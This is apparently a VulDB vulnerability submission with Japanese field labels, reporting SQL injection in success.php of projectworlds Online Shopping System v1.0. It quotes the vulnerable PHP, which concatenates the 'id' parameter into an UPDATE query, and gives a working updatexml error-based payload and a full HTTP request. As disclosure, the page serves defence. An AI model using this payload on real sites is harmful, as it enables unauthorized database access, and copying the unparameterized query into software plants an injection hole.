| タイトル | projectworlds Free Download Online Shopping System v1.0 SQL Injection |
|---|
| 説明 | # SQL Injection vulnerability was discovered in Free Download Online Shopping System(success.php)
Official Website: https://projectworlds.in/free-projects/php-projects/free-download-online-shopping-system/
Version: 1.0 Related Code file: /online-shopping-webvsite-in-php-master/success.php
dbname=store
Payload: /online-shopping-webvsite-in-php-master/success.php?id=1 and(select updatexml(1,concat(0x7e,(select database())),1))--+
<hr>
```php
<?php
session_start();
require 'connection.php';
if(!isset($_SESSION['email'])){
header('location:index.php');
}else{
$user_id=$_GET['id'];
$confirm_query="update users_items set status='Confirmed' where user_id=$user_id";
$confirm_query_result=mysqli_query($con,$confirm_query) or die(mysqli_error($con));
}
?>
```
The id variable is directly inserted into the SQL query without any escaping or parameterization. An attacker could inject malicious SQL code by manipulating the id field. in (line number 1-12 of )
Injection parameter: id
```
GET /online-shopping-webvsite-in-php-master/success.php?id=1%20and(select%20updatexml(1,concat(0x7e,(select%20database())),1))--+ HTTP/1.1
Host: 192.168.1.88
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=jv9bat9nq7anb7bgkppu8kp2oc
Connection: close
```
 |
|---|
| ソース | ⚠️ https://github.com/Sy0ung-cmd/Cve-report/blob/main/SQLi-1.md |
|---|
| ユーザー | SunYihang (UID 77239) |
|---|
| 送信 | 2024年11月09日 12:41 (1 年 ago) |
|---|
| モデレーション | 2024年11月10日 09:32 (21 hours later) |
|---|
| ステータス | 承諾済み |
|---|
| VulDBエントリ | 283805 [Project Worlds Free Download Online Shopping System 迄 192.168.1.88 success.php 識別子 SQLインジェクション] |
|---|
| ポイント | 20 |
|---|